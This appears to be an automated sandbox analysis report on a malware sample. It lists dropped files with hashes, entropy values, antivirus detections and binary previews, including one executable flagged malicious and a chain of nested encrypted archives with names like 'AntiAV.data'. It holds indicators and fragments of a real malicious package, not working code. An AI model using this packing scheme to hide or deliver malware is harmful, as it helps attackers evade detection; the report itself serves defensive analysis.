                                                                                                                                                                                                                                        Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):625464
                                                                                                                                                                                                                                        Entropy (8bit):7.5510269559180125
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:dAcRtQRBRwAI/GE+g19EggvGkKj0cRgzAI/GE+g19EggvGkKj0cRgJ:rjybIeXuugoKocKUIeXuugoKocKJ
                                                                                                                                                                                                                                        MD5:89A069871324D35E25922F6FB881D514
                                                                                                                                                                                                                                        SHA1:985F31CD2E5B7B6C5AB6FF41CE33837987A06171
                                                                                                                                                                                                                                        SHA-256:7FAF92E0275F06214930A5EBBE11F1E98781CCD7CF4B95A0C23E5FCB013AD1AB
                                                                                                                                                                                                                                        SHA-512:9D8E49DE5D5947E8CC682CC70D81191B380260233F26EAB25BEB1398F745EF47EA297A4AAD6D0B30F87AC65EC5B90B5E4516AFABF57CCB519BC4FF6A002D1566
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......//.kN..kN..kN...%..aN...%...N...%..yN..9;..zN..9;..zN..9;..CN...%..bN..kN..0N..=;..jN..=;y.jN..kN..jN..=;..jN..RichkN..........................PE..L....v:a.................&...X)..............@....@...........................*.....^B....@.....................................d.....).................8.....*........8...............................@............@..H............................text...)%.......&.................. ..`.rdata...x...@...z...*..............@..@.data.....'.........................@....rsrc.........).....................@..@.reloc........*.....................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):511531
                                                                                                                                                                                                                                        Entropy (8bit):7.998133089879453
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:J3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:lFmr9DV6TJpZxXEL9rNX7
                                                                                                                                                                                                                                        MD5:392805D581FCA99EDCB5F947E3EBB2CC
                                                                                                                                                                                                                                        SHA1:49506423DE1FE1A89C50BF492E57998A590B9EE6
                                                                                                                                                                                                                                        SHA-256:4A4CD834312421431D41AA5A988FC2FBBCA4165961F9B023CFC2B21EFAD858ED
                                                                                                                                                                                                                                        SHA-512:7D191C9D592739BA54AD6D0BEEA26790B5020CEFAD5AD778FDB5695C13E848E7EFBFE43A1C9DA098DB1AE5E3BC758924746A3CAC2CE5C8AAE1371EBBBF50746A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d.....i^....XT.7._=9d.as....O3PdW.;%..,.V.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512845
                                                                                                                                                                                                                                        Entropy (8bit):7.998150131603083
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:B/3FvrlOjguZKmxM1J/NPT5R82orQYR7truFC/Hd:BvFojtZ/u1JlPTLexxrD/d
                                                                                                                                                                                                                                        MD5:0067A8449FAD7927F7CCD78AD32DDC6C
                                                                                                                                                                                                                                        SHA1:53BF7574BF168C644D40E2404F2346528FB16F18
                                                                                                                                                                                                                                        SHA-256:CFAEEED5348C9AC2D172D31FD2CDFFB253D6BCBE44FC325D490BC368F5229989
                                                                                                                                                                                                                                        SHA-512:6D6D9734833DE212E92C242E08EEEE4BB6D8CEAC2EE6F2AC0BAFA30573E0EFBC8A1EF0DE071B71950D9AB3A524580BC9EEC9EB420E6AFA8A2711EF248372AF14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y.I............file_9.zipd.Sl-l....;..S..]....m.v...m.;Hf2......|w.b-%Yp.8..>.;.m...Z.yh.....o3............9h...?......f..,4.?....o...._.\..I..&...?...a.&.!y[gggR.......R....7...}.......9g...i.;....E.._...;.S../.....!..-.l..g-.G...e....z'{.....X..5?......O..u...G....?.@..*0d..&l.FBVX.;2(P.#...$.......F..V..#.....VZ...p.....JNL...7~.d.Q&..../...+2..].a9..Oe........W..z ....lrh'G.+..$Y..........)|......W.W.{..O...I.F.=....{$....m...F|.<.......6n._.......U.z.H<l.*..6.<...S.V.......?'_........Dpw..@.....].L....j.....|J..........u....w.l.....,_.............e-)..I.y.....VK...-\z.b..:O..b.E.=]..c.....|.k.6`xo.[.'.B.7Z.$..B2L"....k....acN.........W.k..W......5.....f..~...<>............*T.h.u...](p..v..i...../d.....6.;.0.. ..l1....-KkJK..n..3.id..it...'...b...m....H.....]...1..%.bKO9...-..&D].[.O;....]....Bro..m...?,..(.`.....m.D..m.....v..ue......+...9yN.Cy=.U.|.V.....sl|.S..Go. .H.=.!?..V....),..w....wG...Q9.L.5...0..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2180530
                                                                                                                                                                                                                                        Entropy (8bit):7.99835792425981
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:fujCK3D0AC/l5mwbBkDWYb1ZN4UJ9oc0/uNUrT1:faR3D0Ae5mwdkDWm1Xoe4T1
                                                                                                                                                                                                                                        MD5:7632984F9B26DBB8923DA2348366665B
                                                                                                                                                                                                                                        SHA1:C99703AD6DB21039BA169A60C106A08B2BCDB139
                                                                                                                                                                                                                                        SHA-256:69B1C0618D5418CE0E37171191F4AE23986B56779116ED29C3417089654FA897
                                                                                                                                                                                                                                        SHA-512:543750B4FD6BC31884296D8CF0BF8DAF56A90ED4223BD7B7650DC2B668DA4965718F1511459A2900AB8D975923256918415076A2F7E0FF2FAA454522097B1E95
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y.F._Cq....#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):511685
                                                                                                                                                                                                                                        Entropy (8bit):7.998145921569035
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:u3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:YFmr9DV6TJpZxXEL9rNX7
                                                                                                                                                                                                                                        MD5:BD4D86CA5CBAE5438024F64045DB97F6
                                                                                                                                                                                                                                        SHA1:67BA58848842592A9E2F8DD2D1ED97FD3E7D38CB
                                                                                                                                                                                                                                        SHA-256:C64F47CE2527018D5D52CCFEA53103762A1D91146D09938237215AF6968DFAB3
                                                                                                                                                                                                                                        SHA-512:4B5DCE84CDF649CDDFA499A6F875FB00676051E650178A0A742EEA62B91CFF0055CF6B5D2C1517AC500398D531A6F4A02131ED9CCD135B3C4A5BA18D4E2DDCE7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):511839
                                                                                                                                                                                                                                        Entropy (8bit):7.998154920833029
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:E3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lj:SFmr9DV6TJpZxXEL9rNXj
                                                                                                                                                                                                                                        MD5:8854D4E74C1AE01EAA463330A17CF2BD
                                                                                                                                                                                                                                        SHA1:9BFAB26E3B7CC05E4D94DE9930FD1428395458F3
                                                                                                                                                                                                                                        SHA-256:DF9ADC70A263FCEBE4F6EF88404AC0ACF424F2596F3F191A2FFB752B9D4BB064
                                                                                                                                                                                                                                        SHA-512:8C45E9A2F2187FA94DA24835B8F318741F682962211BFDEC5E5BA912112B5717DB4E4AED6E128C985FBEA016980F071D4961549F680B9FE0AB97884FA6559A0A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):511993
                                                                                                                                                                                                                                        Entropy (8bit):7.998157069875339
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:V3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lk:pFmr9DV6TJpZxXEL9rNXk
                                                                                                                                                                                                                                        MD5:FEA1BC14AFA3E37F1E15EB337E72B12C
                                                                                                                                                                                                                                        SHA1:148F4DEBB7F4E31EE7C1C04A11C45B0083043156
                                                                                                                                                                                                                                        SHA-256:6C1795FC843B77D29BD5F103DFC100C8928B7551F01FD8135F21C078B8533A7F
                                                                                                                                                                                                                                        SHA-512:07BCF6FC543D31B6902CA156C3F84A34FE421A8056DDC6533CD32D67B1C3D10A554556C2C28EA656EC4540EDD3B82FE4C5F677115F7C1BBFE4BE7E0CC57CA1A3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512147
                                                                                                                                                                                                                                        Entropy (8bit):7.998155444192939
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:w3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L4:GFmr9DV6TJpZxXEL9rNX4
                                                                                                                                                                                                                                        MD5:FC6106C411428E421DE593673892B72F
                                                                                                                                                                                                                                        SHA1:B5C1F38E1198E26FA2C2B786000E797676794045
                                                                                                                                                                                                                                        SHA-256:C165A3D777629605669D5C7AC7D55240A8DF0CB59686DD91D8A6111C03C67EBE
                                                                                                                                                                                                                                        SHA-512:BF46CA3B6E8DFED16CD701E05E194EB77B7E94FDE74DB260C7E9F679768DD7A1D516A20DE5ECE5E04B850D9582127A883F174C22CD2F47786EB53258EE4DD4A4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y...............file_4.zipPK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512233
                                                                                                                                                                                                                                        Entropy (8bit):7.99811336541424
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:33Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNK:HFy5fZdkDJv73bChNrTRK
                                                                                                                                                                                                                                        MD5:DFCB1DBB6A046FD464412CCD1DAE66FE
                                                                                                                                                                                                                                        SHA1:512DBB73C6BDC9DB181C48BC3BADDFCB36BD018F
                                                                                                                                                                                                                                        SHA-256:0CC1DD7548213C1868612CDB992F566AA701D77A9AE018C709C450561DD22AD9
                                                                                                                                                                                                                                        SHA-512:AF57425587F0590E80386BC947A06330F785B1130A4CC34AAA48008EB74D17F5618D59FBBD796CFCB2F2B207CC07413E0878FFFB625239ABE2869B653F9F9780
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....n.....N,.;..h..n.w..U.........c>.Bo*.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512387
                                                                                                                                                                                                                                        Entropy (8bit):7.998123873104573
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:H3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNV:XFy5fZdkDJv73bChNrTRV
                                                                                                                                                                                                                                        MD5:B7C74415382E8A9078A3A9467BD12517
                                                                                                                                                                                                                                        SHA1:69E51182E425ED6A13D0D021B0BAD8301A1792F5
                                                                                                                                                                                                                                        SHA-256:4BF6B02FE0358DC56339BBC0A26ABE7BE1ABED63B74EB975EC76C356952BDE5B
                                                                                                                                                                                                                                        SHA-512:3E3EDB65B5A2BB69B769922D71259ACA795DE6C84C64458FE4DEB4236BCAB6B7A9919955B72E34D720B4D84445CEF23B081FBE5A7688B6CDD25DE5200D96F361
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512541
                                                                                                                                                                                                                                        Entropy (8bit):7.998130338127172
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:g3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNM:2Fy5fZdkDJv73bChNrTRM
                                                                                                                                                                                                                                        MD5:C9C7BB282A5727DA7E9E1F4E9D8D3FBA
                                                                                                                                                                                                                                        SHA1:79B0AA3EEB4E3A998B357DAC97473948F68EF773
                                                                                                                                                                                                                                        SHA-256:BE879EFDEC472650B101D7BAFE4A1903A7CDDDB8A623A154921C230014D1A19E
                                                                                                                                                                                                                                        SHA-512:E96D16A720B7EE79FE0E059E00A26D833A7B2DB7F58B5220B5E0131A4A5DED923AD59B9BF500E46BAEFCCB8EE0F354CAF9F737CF0371F6AA47C92F3EABB63AA7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512695
                                                                                                                                                                                                                                        Entropy (8bit):7.998132491458882
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:U3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNw:iFy5fZdkDJv73bChNrTRw
                                                                                                                                                                                                                                        MD5:3B90F281C49BDF17DA4ADF690E2A475D
                                                                                                                                                                                                                                        SHA1:86821013A23E5048882BF58711D0549695ACA67D
                                                                                                                                                                                                                                        SHA-256:864947AD239B5E7B903C862FADF82E296EE048D73B70F4FCA516770271F2A741
                                                                                                                                                                                                                                        SHA-512:6F92DB4B36DF182BFB576863A1DF1A8C3AF4929135226ABE5B6B3C59FE6F43E39E4563CCDD22F35D28277B8C826590079A1DEB68BE39F7609E7FDEFAA4209B9E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Ye.*............file_8.zipPK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\conhost.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2180698
                                                                                                                                                                                                                                        Entropy (8bit):7.99990891733921
